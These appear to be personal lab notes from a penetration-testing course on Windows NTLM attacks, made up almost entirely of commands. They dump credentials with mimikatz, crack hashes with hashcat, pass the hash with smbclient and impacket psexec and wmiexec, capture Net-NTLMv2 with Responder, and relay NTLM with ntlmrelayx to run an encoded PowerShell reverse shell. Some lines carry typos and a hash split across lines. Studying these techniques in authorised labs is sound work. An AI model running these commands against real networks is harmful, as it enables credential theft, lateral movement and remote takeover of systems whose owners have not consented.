NTLM Attacks

Cracking NTLM attack

Get-LocalUser

# powershell as admin
cd C:\tools
.\mimikatz.exe

mimikatz> privilege::debug # see privileges

mimikatz> sekurlsa::logonpasswords # large output


mimikatz> token::elevate
mimikatz> lsadump::sam # extracts ntlm hashes (needs elevate)

# crack password and connect with rdp
kali@kali:~/passwordattackss hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt
-r /usr/share/hashcat/rules/best64.rule --force

#find correct hashcat

kali@kali:~/passwordattackss xfreerdp /v:192.168.122.210 /u:nelly /p:nicolel /w:1200 /h:700

Passing NTLM (perfect for lateral movement)

to SMB

kali@kali:~/passwordattacks$ smbclient \\\\192.168.122.212\\secrets -U Administrator 
	--pw-nt-hash 7a38310ea6f0027ee955abed1762964b

kali@kali:~/passwordattacks$ impacket-psexec -hashes 00000000000000000000000000000000:7a38
310ea6f0027ee955abed1762964b Administrator@192.168.122.212
# first 0000 il lm hash, second is ntlm

kali@kali:-/passwordattackss impacket-wmiexec -hashes 00000000000000000000000000000000: 7a:
8310ea6f0027ee955abed1762964b Administrator@192.168.122.212

scenario without local privileges (e.g. for mimikatz)

abuse NetNTLMv2

# see local admins
PS> net user paul

#setup smb server with kali responder, than connect, than get and crack netntlmv2
sudo responder -I tun0

PS> dir \\192.168.119.122\test

# responder automatically cat the ntlm hash.
# we save it in paul.hash

hashcat -m 5600 paul.hash rockyou.txt --force

relaying ntlmv2

# tool ntlmrelayx
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.119.212 -c "powershell -enc base64revshell"

# in files01
PS> dir \\192.168.119.122\test
Invalid signature

# in ntlmrelayx
# connection arrives and it is relayed towards target, then executes command